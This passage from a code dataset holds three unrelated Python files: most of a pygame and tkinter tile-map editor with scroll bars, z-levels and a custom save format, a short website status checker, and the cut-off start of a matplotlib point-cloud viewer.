pg.draw.line(screen, BLACK, (0, WH[1] - 1), (WH[0] - 1, WH[1] - 1))\n\n    pg.draw.line(screen, BLACK, (ts.get_box_width() + 1, 0), (ts.get_box_width() + 1, WH[1]))\n    pg.draw.line(screen, WHITE, (ts.get_box_width() + 2, 0), (ts.get_box_width() + 2, WH[1]))\n    pg.draw.line(screen, BLACK, (ts.get_box_width() + 3, 0), (ts.get_box_width() + 3, WH[1]))\n\n    pg.display.flip()\n\n    #############################\n    #############################\n    #############################\n    def pos_rel_to_ts(pos):\n        return (pos[0] - 1, pos[1] - 1)\n\n    def pos_rel_to_mp(pos):\n        return (pos[0] - ts.get_box_width() - 4, pos[1] - 1)\n\n    #############################\n    #############################\n    #############################\n    clock = pg.time.Clock()\n    #############################\n    #############################\n    #############################\n    b1_held = False\n    b3_held = False\n\n    ctrl_held = False\n\n    saved = True\n    #############################\n    #############################\n    #############################\n    while True:\n        #############################\n        #############################\n        #############################\n        clock.tick(30)\n        thingsChanged = False\n        #############################\n        #############################\n        #############################\n        for evt in pg.event.get():\n            #############################\n            #############################\n            
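# main event dispatch: keyboard shortcuts first, then tileset/map mouse handling\n            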
#############################\n if evt.type == QUIT:\n endMM(saved)\n #############################\n #############################\n #############################\n elif evt.type == KEYDOWN:\n key = evt.dict['key']\n\n if key == K_LCTRL or key == K_RCTRL:\n ctrl_held = True\n\n if key == K_1: # prompt the user for the tile file and open it up\n ts.setCurrent()\n thingsChanged = True\n\n elif key == K_2:\n mp.setSize()\n thingsChanged = True\n saved = False\n\n elif key == K_s and ctrl_held:\n saved = mp.saveMap()\n\n elif key == K_o and ctrl_held:\n mp.loadMap()\n thingsChanged = True\n\n elif key == K_f:\n mp.fillWith(ts.selectedTile())\n thingsChanged = True\n saved = False\n\n elif key == K_RIGHT or key == K_UP:\n mp.changeZLevel(1)\n thingsChanged = True\n\n elif key == K_LEFT or key == K_DOWN:\n mp.changeZLevel(-1)\n thingsChanged = True\n\n elif key == K_SPACE:\n pass\n # pos = pg.mouse.get_pos()\n\n # if mp_rect.collidepoint(pos):\n # \tmp.space_at(pos_rel_to_mp(pos))\n # \tthingsChanged = True\n\n elif key == pg.K_ESCAPE:\n endMM(saved)\n #############################\n #############################\n #############################\n elif evt.type == KEYUP:\n key = evt.dict['key']\n\n if key == K_LCTRL or key == K_RCTRL:\n ctrl_held = False\n #############################\n #############################\n #############################\n elif evt.type == MOUSEBUTTONDOWN:\n button = evt.dict['button']\n pos = evt.dict['pos']\n\n if button == 1:\n b1_held = True\n\n if ts_rect.collidepoint(pos):\n ts.left_click_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.left_click_at(pos_rel_to_mp(pos), ts.selectedTile())\n thingsChanged = True\n saved = False\n\n elif button == 3:\n b3_held = True\n\n if ts_rect.collidepoint(pos):\n ts.right_click_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.right_click_at(pos_rel_to_mp(pos))\n thingsChanged = True\n saved = False\n #############################\n #############################\n #############################\n elif evt.type == MOUSEBUTTONUP:\n button = evt.dict['button']\n pos = evt.dict['pos']\n\n if button == 1:\n b1_held = False\n\n if ts_rect.collidepoint(pos):\n ts.left_release_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.left_release_at(pos_rel_to_mp(pos))\n thingsChanged = True\n\n elif button == 3:\n b3_held = False\n #############################\n #############################\n #############################\n if b1_held:\n pos = pg.mouse.get_pos()\n\n if ts_rect.collidepoint(pos):\n ts.left_hold_at(pos_rel_to_ts(pos))\n thingsChanged = True\n\n elif mp_rect.collidepoint(pos):\n mp.left_hold_at(pos_rel_to_mp(pos), ts.selectedTile())\n thingsChanged = True\n saved = False\n #############################\n #############################\n #############################\n if b3_held:\n pass\n #############################\n #############################\n #############################\n if thingsChanged: pg.display.flip()\n #############################\n #############################\n #############################\n\n\ndef endMM(saved):\n if not saved:\n master = tk.Tk()\n master.withdraw()\n t0 = messagebox.askyesno(\"Exit\", \"Are you sure you want to exit without saving?\")\n master.destroy()\n\n if t0:\n quit()\n else:\n return\n else:\n quit()\n\n\nclass Box:\n def __init__(self, surf):\n # the width of the scroll bar in pixels\n self.SB_WIDTH = 17\n\n # the colors of the scroll bar\n self.SB_COLOR = (240, 240, 
240)\n self.B_COLOR = (150, 150, 150)\n self.BR_COLOR = (180, 180, 180)\n\n # surface minus what belongs to SBs\n # relative to box\n self.surf_rect = pg.Rect((0, 0), (surf.get_width() - self.SB_WIDTH, surf.get_height() - self.SB_WIDTH))\n self.surf = surf.subsurface(self.surf_rect)\n\n # small bottom right corner for indicator\n self.indicator_rect = pg.Rect((self.get_width(), self.get_height()), (self.SB_WIDTH, self.SB_WIDTH))\n self.indicator_surf = surf.subsurface(self.indicator_rect)\n\n # hSB surfaces\n # relative to box\n self.hSB_rect = pg.Rect((0, self.get_height()), (self.get_width(), self.SB_WIDTH))\n self.hSB_surf = surf.subsurface(self.hSB_rect)\n # relative to vSB\n self.hB1_rect = pg.Rect((0, 0), (self.SB_WIDTH, self.SB_WIDTH))\n self.hB1_surf = self.hSB_surf.subsurface(self.hB1_rect)\n self.hB2_rect = pg.Rect((self.hSB_rect.width - self.SB_WIDTH, 0), (self.SB_WIDTH, self.SB_WIDTH))\n self.hB2_surf = self.hSB_surf.subsurface(self.hB2_rect)\n self.hBR_rect = None\n self.hBR_surf = None\n self.h_imgpx_per_barpx = None\n\n self.hSB_surf.fill(self.SB_COLOR)\n self.hB1_surf.fill(self.B_COLOR)\n self.hB2_surf.fill(self.B_COLOR)\n\n # vSB surfaces\n # relative to box\n self.vSB_rect = pg.Rect((self.get_width(), 0), (self.SB_WIDTH, self.get_height()))\n self.vSB_surf = surf.subsurface(self.vSB_rect)\n # relative to vSB\n self.vB1_rect = pg.Rect((0, 0), (self.SB_WIDTH, self.SB_WIDTH))\n self.vB1_surf = self.vSB_surf.subsurface(self.vB1_rect)\n self.vB2_rect = pg.Rect((0, self.vSB_rect.height - self.SB_WIDTH), (self.SB_WIDTH, self.SB_WIDTH))\n self.vB2_surf = self.vSB_surf.subsurface(self.vB2_rect)\n self.vBR_rect = None\n self.vBR_surf = None\n self.v_imgpx_per_barpx = None\n\n self.vSB_surf.fill(self.SB_COLOR)\n self.vB1_surf.fill(self.B_COLOR)\n self.vB2_surf.fill(self.B_COLOR)\n\n # self.vSB_surf.fill(RED)\n # self.hSB_surf.fill(GREEN)\n\n self.img = None\n self.img_rect = None\n\n self.holdingBar = None\n\n def get_width(self):\n return self.surf.get_width()\n\n def get_height(self):\n return self.surf.get_height()\n\n def blit(self, *args):\n self.surf.blit(*args)\n\n def fill(self, *args):\n self.surf.fill(*args)\n\n def get_box_width(self):\n return self.get_width() + self.SB_WIDTH\n\n def get_box_height(self):\n return self.get_height() + self.SB_WIDTH\n\n def setImg(self, img):\n self.img = img\n\n w = img.get_width()\n if img.get_width() > self.surf_rect.width:\n w = self.surf_rect.width\n h = img.get_height()\n if img.get_height() > self.surf_rect.height:\n h = self.surf_rect.height\n\n self.img_rect = pg.Rect((0, 0), (w, h))\n\n self.blit(self.img.subsurface(self.img_rect), (0, 0))\n\n h_fraction = float(self.get_width()) / img.get_width()\n if h_fraction < 1:\n if h_fraction < 0.05:\n h_fraction = 0.05\n\n h_maxbarsize = (self.hSB_rect.width - self.hB1_rect.width - self.hB2_rect.width)\n h_barsize = int(h_maxbarsize * h_fraction)\n\n self.hBR_rect = pg.Rect((self.SB_WIDTH, 0), (h_barsize, self.SB_WIDTH))\n self.hBR_surf = self.hSB_surf.subsurface(self.hBR_rect)\n\n self.hBR_surf.fill(self.BR_COLOR)\n\n self.h_imgpx_per_barpx = (img.get_width() - self.get_width()) / float(h_maxbarsize - h_barsize)\n\n v_fraction = float(self.get_height()) / img.get_height()\n if v_fraction < 1:\n if v_fraction < 0.05:\n v_fraction = 0.05\n v_maxbarsize = (self.vSB_rect.height - self.vB1_rect.height - self.vB2_rect.height)\n v_barsize = int(v_maxbarsize * v_fraction)\n\n self.vBR_rect = pg.Rect((0, self.SB_WIDTH), (self.SB_WIDTH, v_barsize))\n self.vBR_surf = 
self.vSB_surf.subsurface(self.vBR_rect)\n\n self.vBR_surf.fill(self.BR_COLOR)\n\n self.v_imgpx_per_barpx = (img.get_height() - self.get_height()) / float(v_maxbarsize - v_barsize)\n\n def rel2abs_pos(self, pos): # relative to where it's scrolled to\n return (pos[0] + self.img_rect.left, pos[1] + self.img_rect.top)\n\n def abs2rel_pos(self, pos):\n return (pos[0] - self.img_rect.left, pos[1] - self.img_rect.top)\n\n def refreshRelImg(self):\n self.fill(GRAY)\n self.blit(self.img.subsurface(self.img_rect), (0, 0))\n\n def left_click_at(self, pos):\n if self.hSB_rect:\n if self.hSB_rect.collidepoint(pos):\n self.holdingBar = (\"h\", pos[0])\n return\n if self.vSB_rect:\n if self.vSB_rect.collidepoint(pos):\n self.holdingBar = (\"v\", pos[1])\n return\n\n def left_hold_at(self, pos):\n if not self.holdingBar:\n return\n\n elif self.holdingBar[0] == \"h\":\n pixChange = pos[0] - self.holdingBar[1]\n\n if not (self.hBR_rect.left + pixChange > self.hB1_rect.width):\n pixChange = self.hB1_rect.width - self.hBR_rect.left\n elif not (self.hBR_rect.right + pixChange <= self.hSB_rect.width - self.hB2_rect.width):\n pixChange = (self.hSB_rect.width - self.hB2_rect.width) - self.hBR_rect.right\n\n self.hBR_rect = pg.Rect((self.hBR_rect.left + pixChange, self.hBR_rect.top), self.hBR_rect.size)\n self.hBR_surf = self.hSB_surf.subsurface(self.hBR_rect)\n\n self.hSB_surf.fill(self.SB_COLOR)\n self.hB1_surf.fill(self.B_COLOR)\n self.hB2_surf.fill(self.B_COLOR)\n self.hBR_surf.fill(self.BR_COLOR)\n\n self.holdingBar = (self.holdingBar[0], pos[0])\n\n barOver_px = self.hBR_rect.left - self.hB1_rect.width\n imgShift = int(barOver_px * self.h_imgpx_per_barpx)\n self.img_rect = pg.Rect((imgShift, self.img_rect.top), self.img_rect.size)\n self.refreshRelImg()\n\n elif self.holdingBar[0] == \"v\":\n pixChange = pos[1] - self.holdingBar[1]\n\n if not (self.vBR_rect.top + pixChange > self.vB1_rect.height):\n pixChange = self.vB1_rect.height - self.vBR_rect.top\n elif not (self.vBR_rect.bottom + pixChange <= self.vSB_rect.height - self.vB2_rect.height):\n pixChange = (self.vSB_rect.height - self.vB2_rect.height) - self.vBR_rect.bottom\n\n self.vBR_rect = pg.Rect((self.vBR_rect.left, self.vBR_rect.top + pixChange), self.vBR_rect.size)\n self.vBR_surf = self.vSB_surf.subsurface(self.vBR_rect)\n\n self.vSB_surf.fill(self.SB_COLOR)\n self.vB1_surf.fill(self.B_COLOR)\n self.vB2_surf.fill(self.B_COLOR)\n self.vBR_surf.fill(self.BR_COLOR)\n\n self.holdingBar = (self.holdingBar[0], pos[1])\n\n barOver_px = self.vBR_rect.top - self.vB1_rect.height\n imgShift = int(barOver_px * self.v_imgpx_per_barpx)\n self.img_rect = pg.Rect((self.img_rect.left, imgShift), self.img_rect.size)\n self.refreshRelImg()\n\n def left_release_at(self, pos):\n self.holdingBar = None\n\n\nclass TS(Box):\n def __init__(self, surf):\n Box.__init__(self, surf)\n\n self.ts_selected = False\n self.ts_file = None\n\n self.selected_tile = None\n\n def tsSelected(self):\n return self.ts_selected\n\n def selectedTile(self):\n return self.selected_tile\n\n def setCurrent(self):\n master = tk.Tk()\n master.withdraw()\n t0 = filedialog.askopenfilename(initialdir=MAPART_DIR)\n master.destroy()\n\n # leave if they choose cancel\n if not t0:\n return\n\n t0 = os.path.relpath(t0)\n\n # leave if it isn't a supported file type\n try:\n t1 = pg.image.load(t0).convert()\n except:\n return\n\n self.ts_file = t0\n self.setImg(t1)\n self.ts_selected = True\n\n self.selected_tile = None\n\n self.fill(GRAY)\n self.blit(self.img, (0, 0))\n\n def left_click_at(self, pos, 
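Editor's note: the ratios computed in Box.setImg above (h_imgpx_per_barpx, v_imgpx_per_barpx) and applied in left_hold_at map dragged bar pixels to image pixels: the bar travels over (track - bar) pixels while the image must shift over (image - view) pixels. A small worked sketch with made-up sizes:

img_w, view_w = 1600, 400                      # image wider than the viewport
sb = 17                                        # end-button size, as in Box.SB_WIDTH
track_w = view_w - 2 * sb                      # track between the two end buttons
bar_w = int(track_w * view_w / float(img_w))   # bar length ~ visible fraction
px_per_bar_px = (img_w - view_w) / float(track_w - bar_w)

bar_offset = 100                               # bar dragged 100 px from the left stop
img_left = int(bar_offset * px_per_bar_px)     # leftmost visible image column
assert 0 <= img_left <= img_w - view_w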
highlight=GREEN):\n if not self.ts_selected:\n return\n\n if not self.surf_rect.collidepoint(pos):\n Box.left_click_at(self, pos)\n return\n elif not ((pos[0] < self.img.get_width()) and (pos[1] < self.img.get_height())):\n return\n\n pos = self.rel2abs_pos(pos)\n pos = pix2tile(pos)\n\n # reset the old selected tile (if it's not the first time)\n if self.selected_tile:\n # #if it's the same tile do nothing\n # if self.selected_tile.xy == pos:\n # \treturn\n\n # not anymore because you can right click to make it blocked\n\n rect = tile2rect(self.selected_tile.xy)\n self.img.subsurface(rect).fill(GRAY)\n self.img.blit(self.selected_tile.img, rect.topleft)\n\n # set the new tile\n rect = tile2rect(pos)\n self.selected_tile = Tile(self.ts_file, pos, self.img.subsurface(rect).copy())\n\n if highlight is GREEN:\n self.selected_tile.setBlocked(False)\n elif highlight is RED:\n self.selected_tile.setBlocked(True)\n else:\n print(\"invalid color choice for highlight/block\")\n\n # highlight the new tile\n surf = pg.Surface(TILE_RES)\n surf.fill(highlight)\n surf.set_alpha(75)\n self.img.blit(surf, rect.topleft)\n\n self.refreshRelImg()\n\n def right_click_at(self, pos):\n self.left_click_at(pos, highlight=RED)\n\n# def left_hold_at(self, pos):\n# \tif self.surf_rect.collidepoint(pos):\n# \t\tpass\n# \telse:\n# \t\tBox.left_hold_at(pos)\n# \t\treturn\n\n\nclass MP(Box):\n def __init__(self, surf):\n Box.__init__(self, surf)\n\n self.tileSize_selected = False\n self.tileSize = None\n\n self.currentZ = 0\n self.currentZ_img = None\n self.z_img = {}\n\n self.gridlines = None\n\n self.pos_z_tile = {}\n\n self.leftClickOnMap = False\n\n def setSize(self, automated=False):\n def submit():\n if not automated:\n failed = False\n\n try:\n x = int(x_entry.get())\n y = int(y_entry.get())\n\n if x < 1 or y < 1:\n failed = True\n except:\n failed = True\n\n if failed:\n messagebox.showerror(\"X/Y Error\", \"X and Y must be positive integers.\")\n return\n\n master.destroy()\n else:\n x = automated[0]\n y = automated[1]\n\n self.tileSize = (x, y)\n self.tileSize_selected = True\n\n self.setImg(pg.Surface((TILE_RES[0] * x + 1, TILE_RES[1] * y + 1))) # +1 for the last gridline\n self.img.fill(GRAY)\n\n self.currentZ_img = pg.Surface(self.img.get_size(), pg.SRCALPHA, 32).convert_alpha()\n\n self.gridlines = pg.Surface(self.img.get_size(), pg.SRCALPHA, 32).convert_alpha()\n for i in range(x + 1):\n pg.draw.line(self.gridlines, BLACK, (i * TILE_RES[0], 0), (i * TILE_RES[0], self.img.get_height() - 1))\n for i in range(y + 1):\n pg.draw.line(self.gridlines, BLACK, (0, i * TILE_RES[1]), (self.img.get_width() - 1, i * TILE_RES[1]))\n\n self.img.blit(self.gridlines, (0, 0))\n self.blit(self.img, (0, 0))\n\n # fill up the tile dict\n for i in range(x):\n for j in range(y):\n self.pos_z_tile[(i, j)] = {}\n\n if not automated:\n if self.tileSize_selected:\n master = tk.Tk()\n master.withdraw()\n messagebox.showwarning(\"Map Size\",\n \"You can't change the size once you've begun. 
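Editor's note: MP.setSize above keeps the gridlines on a separate per-pixel-alpha surface and re-blits them over the map after every change. A minimal sketch of that overlay pattern (window and grid sizes here are made up, and convert_alpha() needs a display mode to exist, so this will not run headless):

import pygame as pg

pg.init()
pg.display.set_mode((320, 320))          # convert_alpha() requires a display
grid = pg.Surface((320, 320), pg.SRCALPHA, 32).convert_alpha()
for i in range(0, 321, 32):              # one line per tile edge, both axes
    pg.draw.line(grid, (0, 0, 0), (i, 0), (i, 320))
    pg.draw.line(grid, (0, 0, 0), (0, i), (320, i))
base = pg.Surface((320, 320))
base.fill((200, 200, 200))               # gray map background, as in MP
base.blit(grid, (0, 0))                  # transparent pixels leave base intact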
Try saving (ctrl+S) and creating a new file (ctrl+N).\")\n return\n\n master = tk.Tk()\n master.title(\"Map Size\")\n frame = tk.Frame(master)\n frame.pack()\n\n r = 0\n tk.Label(frame, text=\"Choose an x & y:\").grid(row=r, column=0, columnspan=2, sticky=tk.W + tk.E)\n\n r += 1\n tk.Label(frame, text=\"X (in tiles):\").grid(row=r, column=0, columnspan=1, sticky=tk.W + tk.E)\n x_entry = tk.Entry(frame)\n x_entry.grid(row=r, column=1, columnspan=1, stick=tk.W + tk.E)\n\n r += 1\n tk.Label(frame, text=\"Y (in tiles):\").grid(row=r, column=0, columnspan=1, sticky=tk.W + tk.E)\n y_entry = tk.Entry(frame)\n y_entry.grid(row=r, column=1, columnspan=1, stick=tk.W + tk.E)\n\n r += 1\n submit_button = tk.Button(frame, text='Submit', fg='black', command=submit)\n submit_button.grid(row=r, column=0, columnspan=2, sticky=tk.W + tk.E)\n\n master.mainloop()\n\n else:\n submit()\n\n self.updateZIndicator(self.currentZ)\n\n def updateZIndicator(self, z):\n w = self.indicator_rect.width - 2\n h = self.indicator_rect.height - 2\n\n # first a gray box to mask old number\n surf = pg.Surface((w, h))\n surf.fill(GRAY)\n\n # then make the new number and put it on surf\n num = pg.font.Font(None, h)\n num = num.render(str(z), True, BLACK)\n surf.blit(num, (0, 0))\n\n # then put surf on the image\n self.indicator_surf.blit(surf, (1, 1))\n\n def left_click_at(self, pos, tile, automated_clicking=False):\n # the x/y has not been set\n if not self.tileSize_selected:\n return\n # the click was on the scroll bars BUT automated_clicking bypasses boundaries (for function fillWith)\n elif (not self.surf_rect.collidepoint(pos)) and (not automated_clicking):\n Box.left_click_at(self, pos)\n return\n # turn click on\n else:\n self.leftClickOnMap = True\n\n # click is outside of map but not on scroll bars (small map)\n if not ((pos[0] < self.img.get_width()) and (pos[1] < self.img.get_height())):\n return\n # clcik is right on the border (the right and bottom gridlines)\n elif (self.rel2abs_pos(pos)[0] >= self.img.get_width() - 1) or (\n self.rel2abs_pos(pos)[1] >= self.img.get_height() - 1):\n return\n # no tile has been selected yet\n elif tile is None:\n return\n\n tile_img = tile.img.copy()\n if tile.blocked:\n # make red square\n surf = pg.Surface(TILE_RES)\n surf.fill(RED)\n surf.set_alpha(50)\n # put it on the tile img\n tile_img.blit(surf, (0, 0))\n\n # # prepare the image by drawing the graph lines\n # pg.draw.line(tile_img, BLACK, (0, 0), (TILE_RES[0]-1, 0))\n # pg.draw.line(tile_img, BLACK, (0, 0), (0, TILE_RES[1]-1))\n\n # blit the tile to the currentZ_img\n pos = self.rel2abs_pos(pos)\n rect = pix2tile2rect(pos)\n self.currentZ_img.blit(tile_img, rect)\n\n # place on main img: /gray, transparent z's below,/ itself, transparent zs above, gridline\n\n # for z in self.z_img:\n # \tif z > self.currentZ:\n # \t\ttemp = self.z_img[z].subsurface(rect).convert()\n # \t\ttemp.set_alpha(100)\n # \t\ttile_img.blit(temp, (0,0))\n tile_img.blit(self.gridlines.subsurface(rect), (0, 0))\n self.img.blit(tile_img, rect)\n\n self.refreshRelImg()\n\n # put it in the tile dict\n tile.setCoords(pix2tile(pos), self.currentZ)\n self.pos_z_tile[pix2tile(pos)][self.currentZ] = tile\n\n def left_hold_at(self, pos, tile):\n if not self.leftClickOnMap:\n Box.left_hold_at(self, pos)\n return\n\n self.left_click_at(pos, tile)\n\n def left_release_at(self, pos):\n if not self.leftClickOnMap:\n Box.left_hold_at(self, pos)\n return\n\n self.leftClickOnMap = False\n\n def right_click_at(self, pos):\n if not self.tileSize_selected:\n return\n\n if 
not self.surf_rect.collidepoint(pos):\n return\n elif not ((pos[0] < self.img.get_width()) and (pos[1] < self.img.get_height())):\n return\n\n pos = self.rel2abs_pos(pos)\n\n try:\n del (self.pos_z_tile[pix2tile(pos)][self.currentZ])\n except:\n return\n\n rect = pix2tile2rect(pos)\n\n # make a gray tile with graph lines\n tile_img = pg.Surface(TILE_RES)\n tile_img.fill(GRAY)\n # put on the zs below images\n for z in self.z_img:\n if z < self.currentZ:\n temp = self.z_img[z].subsurface(rect)\n tile_img.blit(temp, (0, 0))\n # put the graph lines on\n tile_img.blit(self.gridlines.subsurface(rect), (0, 0))\n self.img.blit(tile_img, rect)\n\n # clear the z_img\n temp = self.currentZ_img.subsurface(rect)\n temp.fill((0, 0, 0, 0))\n\n # pg.draw.line(blank, BLACK, (0, 0), (TILE_RES[0]-1, 0))\n # pg.draw.line(blank, BLACK, (0, 0), (0, TILE_RES[1]-1))\n\n # blit the tile to the img\n # pos = self.rel2abs_pos(pos)\n self.img.blit(tile_img, rect)\n\n self.refreshRelImg()\n\n def fillWith(self, tile):\n if not tile:\n return\n elif not self.tileSize_selected:\n return\n\n master = tk.Tk()\n master.withdraw()\n t0 = messagebox.askyesno(\"Fill\",\n \"Are you sure you want to fill the entire map with this? It will overwrite all spots, not just empty ones.\")\n master.destroy()\n\n if t0:\n for i in range(self.tileSize[0]):\n for j in range(self.tileSize[1]):\n self.left_click_at((i * TILE_RES[0], j * TILE_RES[1]), tile, automated_clicking=True)\n\n self.left_release_at((0, 0))\n\n def changeZLevel(self, ud):\n if not self.tileSize_selected:\n return\n\n if self.currentZ + ud < 0:\n return\n\n # save this z's image\n self.z_img[self.currentZ] = self.currentZ_img.copy()\n\n # go to new z and announce it\n self.currentZ += ud\n self.updateZIndicator(self.currentZ)\n\n try:\n # load the old z_img\n self.currentZ_img = self.z_img[self.currentZ]\n except:\n # make new currentZ_img\n self.currentZ_img = pg.Surface(self.img.get_size(), pg.SRCALPHA, 32).convert_alpha()\n\n # main img: gray, transparent z's below, itself, transparent zs above, gridline\n self.img.fill(GRAY)\n # for z in self.z_img:\n # \ttemp = self.z_img[z]\n\n # \tif z != self.currentZ:\n # \t\ttemp = temp.copy()\n # \t\ttemp.set_alpha(50)\n\n # \tself.img.blit(temp, (0,0))\n\n for z in self.z_img:\n if z <= self.currentZ:\n temp = self.z_img[z]\n\n if z != self.currentZ:\n temp = temp.copy()\n temp.set_alpha(50)\n\n self.img.blit(temp, (0, 0))\n\n self.img.blit(self.gridlines, (0, 0))\n\n self.refreshRelImg()\n\n def saveMap(self):\n if not self.tileSize_selected:\n return True\n\n master = tk.Tk()\n master.withdraw()\n fileName = filedialog.asksaveasfilename(initialdir=SAVE_DIR)\n master.destroy()\n\n # leave if they choose cancel\n if not fileName:\n return False\n\n # go through once to get all the unique tile sets\n tileSets = set()\n for i in range(self.tileSize[0]):\n for j in range(self.tileSize[1]):\n try:\n for z in self.pos_z_tile[(i, j)]:\n tile = self.pos_z_tile[(i, j)][z]\n tileSets.add(tile.ts)\n except:\n pass # no tiles at this pos\n\n # open file\n file = open(fileName, \"w\")\n # give header\n file.write(\">>> Tile Source [size x:y]\\n\")\n # add the tilesets and make a dict\n ts_number = {}\n i = 0\n for ts in tileSets:\n file.write(str(i) + \"-> \" + ts[3:] + \" [32:32]\\n\") # [3:] to remove ../\n ts_number[ts] = i\n i += 1\n # give intermediate stuff\n file.write(\">>> Map Size in Tiles (x/y)\\n\" + \\\n str(self.tileSize[0]) + \":\" + str(self.tileSize[1]) + \"\\n\" + \\\n \">>> Setup (Source-> Map col:row/Tile 
col:row)\")\n\n # go through once more to fill file\n for i in range(self.tileSize[0]):\n for j in range(self.tileSize[1]):\n # position on map\n k = 0\n line = \"\\n\" + str(i) + \":\" + str(j) + \"+\"\n for z in self.pos_z_tile[(i, j)]:\n tile = self.pos_z_tile[(i, j)][z]\n\n # divider if there are more than one zs at this position\n if k > 0:\n line += \"|\"\n\n # file number\n line += (str(ts_number[tile.ts])) + \"->\"\n # tile coord in tileset\n line += str(tile.xy[0]) + \":\" + str(tile.xy[1])\n # blocked\n if tile.blocked:\n line += \"(1)\"\n else:\n line += \"(0)\"\n # z\n line += \"[\" + str(tile.z) + \"]\"\n\n k += 1\n\n if k > 0:\n file.write(line)\n\n file.close()\n\n return True\n\n def loadMap(self):\n master = tk.Tk()\n master.withdraw()\n fileName = filedialog.askopenfilename(initialdir=SAVE_DIR)\n master.destroy()\n\n # leave if they choose cancel\n if not fileName:\n return False\n\n class TileMap:\n def __init__(self, tileFile, squareSize):\n self.tileFile = tileFile\n self.tileImg = pg.image.load(self.tileFile).convert()\n self.tileDict = self.genSubsurfaces(squareSize)\n\n def getTile(self, coords):\n return self.tileDict[coords]\n\n def getName(self):\n return self.tileFile\n\n def genSubsurfaces(self, squareSize):\n tileDict = {}\n imgRect = self.tileImg.get_rect()\n x, y = 0, 0\n morey = True\n while morey:\n while True:\n tile = tile2rect((x, y))\n if imgRect.contains(tile):\n tileDict[(x, y)] = self.tileImg.subsurface(tile)\n x += 1\n else:\n if x == 0:\n morey = False\n else:\n x = 0\n break\n y += 1\n return tileDict\n\n theMap = [line.strip() for line in open(fileName, 'r').readlines()]\n\n line = 1\n\n tileFiles = []\n while not theMap[line].startswith(\">>>\"):\n tileFiles.append(theMap[line])\n line += 1\n for i in range(len(tileFiles)):\n number, temp = tileFiles[i].split(\"-> \")\n number = int(number)\n source, xy = temp.split(\" [\")\n source = \"../\" + source\n xy = xy[:-1].split(\":\")\n xy = (int(xy[0]), int(xy[1]))\n tileFiles[i] = source\n # check that all tileFiles have same res and that they match the given res\n if xy != TILE_RES:\n print(\"Warning: Tile size inconsistency from tile files\")\n raise KeyboardInterrupt\n\n for i in range(len(tileFiles)):\n tileFiles[i] = TileMap(tileFiles[i], TILE_RES)\n\n line += 1\n\n mapSize = tuple([int(i) for i in theMap[line].split(\":\")])\n self.setSize(automated=mapSize)\n\n line += 2\n\n onward = line\n\n maxZ = 0\n for line in theMap[onward:]:\n posOnMap, tiles = line.split(\"+\")\n posOnMap = posOnMap.split(\":\")\n posOnMap = (int(posOnMap[0]), int(posOnMap[1]))\n\n tiles = tiles.split(\"|\")\n\n # self.pos_z_tile[posOnMap] = {}\n for each in tiles:\n # source -> the file the tile img is coming from\n source, temp = each.split(\"->\")\n source = int(source)\n\n # posOnTileFile -> the x,y coords of the img on source\n posOnTileFile, temp = temp.split(\"(\")\n posOnTileFile = posOnTileFile.split(\":\")\n posOnTileFile = (int(posOnTileFile[0]), int(posOnTileFile[1]))\n\n # blocked -> whether or not the tile can be walked on\n blocked, z = temp.split(\")[\")\n blocked = True if blocked == \"1\" else False\n\n # z -> the z the tile is on\n z = int(z[:-1])\n if z > maxZ: maxZ = z + 0\n\n self.pos_z_tile[posOnMap][z] = Tile(tileFiles[source].getName(), posOnTileFile,\n tileFiles[source].getTile(posOnTileFile))\n self.pos_z_tile[posOnMap][z].setCoords(posOnMap, z)\n self.pos_z_tile[posOnMap][z].setBlocked(blocked)\n\n # place the tiles\n while self.currentZ != maxZ + 1:\n for pos in self.pos_z_tile:\n for z 
in self.pos_z_tile[pos]:\n if z == self.currentZ:\n self.left_click_at((pos[0] * TILE_RES[0], pos[1] * TILE_RES[1]), self.pos_z_tile[pos][z],\n automated_clicking=True)\n self.changeZLevel(1)\n\n while self.currentZ != 0:\n self.changeZLevel(-1)\n\n# def left_hold_at(self, pos):\n# \tif self.surf_rect.collidepoint(pos):\n# \t\tpass\n# \telse:\n# \t\tBox.left_hold_at(pos)\n\n\nclass Tile:\n def __init__(self, tileset, xy, img):\n self.ts = tileset # the files the tile comes from\n self.xy = xy # the xy tile coord of the tile img\n self.img = img # th surface (image) of the tile\n\n self.pos = None # the location on the map\n self.z = None # what z the tile is on\n self.blocked = None # whether or not the tile is blocked\n\n def setCoords(self, pos, z):\n self.pos = pos\n self.z = z\n\n def setBlocked(self, blocked):\n self.blocked = blocked\n\n\nif __name__ == '__main__':\n runMaker()\n","repo_name":"rekabat/Shards-Unnamed","sub_path":"tools/mm.py","file_name":"mm.py","file_ext":"py","file_size_in_byte":36092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36369398379","text":"import requests\n\ntry:\n users = input('enter URL: ')\n r = requests.get(users)\n if r.status_code == 200:\n print(\"Website is up!\")\n else:\n print(\"Website is down :(\")\nexcept:\n print(\"URL not valid, try again! (try with http or https://wwww.websiteofchoice.com)\")\n","repo_name":"N00binatora/URL-Verifier","sub_path":"pop.py","file_name":"pop.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16111220893","text":"import argparse\nimport os\nimport pickle\n\nimport numpy as np\nfrom numpy.typing import NDArray\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button, Slider\n\nfrom src import utils, viz_utils\nfrom src.real_world import constants\n\n\ndef update_axis(ax, source_obj: NDArray, robotiq_points: NDArray, vmin: float, vmax: float):\n\n ax.clear()\n ax.scatter(source_obj[:, 0], source_obj[:, 1], source_obj[:, 2], color=\"red\", alpha=0.2)\n ax.scatter(robotiq_points[:, 0], robotiq_points[:, 1], robotiq_points[:, 2], color=\"green\", alpha=1.0, s=100)\n ax.set_xlim(vmin, vmax)\n ax.set_ylim(vmin, vmax)\n ax.set_zlim(vmin, vmax)\n\n\ndef main(args):\n\n smin, smax = -2., 2.\n vmin, vmax = -0.3, 0.3\n\n if args.task == \"mug_tree\":\n canon_source = utils.CanonObj.from_pickle(constants.NDF_MUGS_PCA_PATH)\n canon_source.init_scale = constants.NDF_MUGS_INIT_SCALE\n elif args.task == \"bowl_on_mug\":\n canon_source = utils.CanonObj.from_pickle(constants.NDF_BOWLS_PCA_PATH)\n 